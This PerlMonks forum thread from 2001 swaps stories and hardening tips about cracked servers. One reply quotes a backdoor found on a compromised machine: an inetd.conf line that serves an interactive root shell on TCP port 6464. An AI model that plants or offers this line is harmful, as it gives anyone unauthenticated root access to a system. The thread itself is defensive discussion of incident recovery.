Beefy Boxes and Bandwidth Generously Provided by pair Networks
Do you know where your variables are?
 
PerlMonks  

Re: ACKKKKKKKKK! I Have been cracked!

by petethered (Pilgrim)
on Apr 03, 2001 at 17:47 UTC ( [id://69300]=note: print w/replies, xml ) Need Help??


in reply to ACKKKKKKKKK! I Have been cracked!

Ive been the person called in to repair dozens of cracked servers. Alot of times, when a box gets cracked its pure laziness.

You should always keep an ear out for security patches. You should always block IPs based on hosts.allow and deny. You should always have MySQLs access tables defined, and not world accessable. Dont allow anyone who isnt trusted telnet/ssh access to your box ( once your in, your good as root ).

Doing this prevents the script kiddies from getting in your box, But this will not prevent a REAL cracker from accessing your box.

On a side note, I recently was called in to help fix a box and found the following backdoor installed.

in inetd.conf:

6464 stream tcp nowait root /bin/sh sh -i

So simple It was beautiful... a perfect back door that few people would catch.

-pete

Replies are listed 'Best First'.
Re^2: ACKKKKKKKKK! I Have been cracked!
by tadman (Prior) on Apr 03, 2001 at 18:18 UTC
    As an aside that is hopefully not too OT, one of the boxes here was cracked once. It was all because of a simple (human) error. POP3/FTP passwords are sent plaintext, and so the system was configured to have different passwords for POP3/FTP from the system accounts. Unfortunately, due to laziness, I suppose, one of the admins set their password to be the same for both and later logged in from home to check their mail.

    A few days later, our box was cracked with an off-the-shelf "root kit". Even though we were using SSH, they were able to "sniff" the POP3 password over their cable modem and then log in using SSH, use SUDO, and have their way with our system.

    Thankfully the 'haX0r' only ran some sort of IRC bot or relay program and didn't do any real damage.

    Always make sure that your POP3 and FTP passwords are not the same as your SSH login! Especially for users with 'sudo' access!
[reply]
      Actually, I'd recommend having completely separate accounts for sudo (only used off-site in emergencies, otherwise on-site only), with RSA authentication only. Keep the email on a separate, private, non-privileged account.

      --isotope
      http://www.skylab.org/~isotope/
[reply]

In Section Meditations

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?

www.com | www.net | www.org
Node Status?
node history
Node Type: note [id://69300]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others sharing their wisdom with the Monastery: (6)
As of 2024-04-25 11:12 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found